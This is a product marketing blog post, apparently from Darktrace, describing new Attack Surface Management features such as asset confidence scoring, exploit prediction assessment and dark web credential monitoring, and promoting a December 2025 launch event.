What changes for your team

Before:

  • Hundreds of findings, unclear what to start with
  • Reactive investigations triggered by incidents

After:

  • A prioritized backlog based on confidence score or exploit prediction assessment verification
  • Proactive verification of exposure with real-world risk without manual efforts

Confidence Score: Prioritize based on the use-case you care most about

What is it?

Confidence Score is a metric that expresses similarity of newly discover assets compared to the confirmed asset inventory. Several self-learning algorithms compare features of assets to be able to calculate a score.

Why it matters

Traditional Attack Surface Management tools treat all new discovery equally, making it unclear to your team how to identify the most important newly discovered assets, potentially causing you to miss a spoofing domain or shadow IT that could impact your business.

How it helps your team

We’re dividing newly discovered assets into separate insight buckets that each cover a slightly different business case.

  • Low scoring assets: to cover phishing & spoofing domains (like domain variants) that are just being registered and don't have content yet.
  • Medium scoring assets: have more similarities to your digital estate, but have better matching to HTML, brand names, keywords. Can still be phishing but probably with content.
  • High scoring assets: These look most like the rest of your confirmed digital estate, either it's phishing that needs the highest attention, or the asset belongs to your attack surface and requires asset state confirmation to enable the platform to monitor it for risks.

Smarter Exposure Management for CTEM Programs

Recent updates to Darktrace / Attack Surface Management directly advance the core phases of Continuous Threat Exposure Management (CTEM): scope, discover, prioritize, validate, and mobilize. The new Exploit Prediction Assessment helps teams validate and prioritize vulnerabilities based on real-world exploitability, while Deep & Dark Web Monitoring extends discovery into hard-to-reach areas where stolen data and credentials often surface. Together, these capabilities reduce noise, accelerate remediation, and help organizations maintain continuous visibility over their expanding attack surface.

Building on these innovations, Darktrace / Attack Surface Management empowers security teams to focus on what truly matters. By validating exploitability, it cuts through the noise of endless vulnerability lists—helping defenders concentrate on exposures that represent genuine business risk. Continuous monitoring for leaked credentials across the deep and dark web further extends visibility beyond traditional asset discovery, closing critical blind spots where attackers often operate. Crucially, these capabilities complement, not replace, existing security controls such as annual penetration tests, providing continuous, low-friction validation between formal assessments. The result is a more adaptive, resilient security posture that keeps pace with an ever-evolving threat landscape.

If you’re building or maturing a CTEM program—and want fewer open exposures, faster remediation, and better outcomes, Darktrace / Attack Surface Management’s new Exploit Prediction Assessment and Deep & Dark Web Monitoring are ready to help.

  • Want a more in-depth look at how Exploit Prediction Assessment functions? Read more here

Committed to innovation

These updates are part of the broader Darktrace release, which also included:

1. Major innovations in cloud security with the launch of the industry’s first fully automated cloud forensics solution, reinforcing Darktrace’s leadership in AI-native security.

2. Darktrace Network Endpoint eXtended Telemetry (NEXT) is revolutionizing NDR with the industry’s first mixed-telemetry agent using Self-Learning AI.

3. Improvements to our OT product, purpose built for industrial infrastructure, Darktrace / OT now brings dedicated OT dashboard, segmentation-aware risk modeling, and expanded visibility into edge assets and automation protocols.

Join our Live Launch Event

When? 

December 9, 2025

What will be covered?

Join our live broadcast to experience how Darktrace is eliminating blind spots for detection and response across your complete enterprise with new innovations in Agentic AI across our ActiveAI Security platform. Industry leaders from IDC will join Darktrace customers to discuss challenges in cross-domain security, with a live walkthrough reshaping the future of Network Detection & Response, Endpoint Detection & Response, Email Security, and SecOps in novel threat detection and autonomous investigations.

Continue reading
About the author
Kelland Goodin
Product Marketing Specialist
Your data. Our AI.
Elevate your network security with Darktrace AI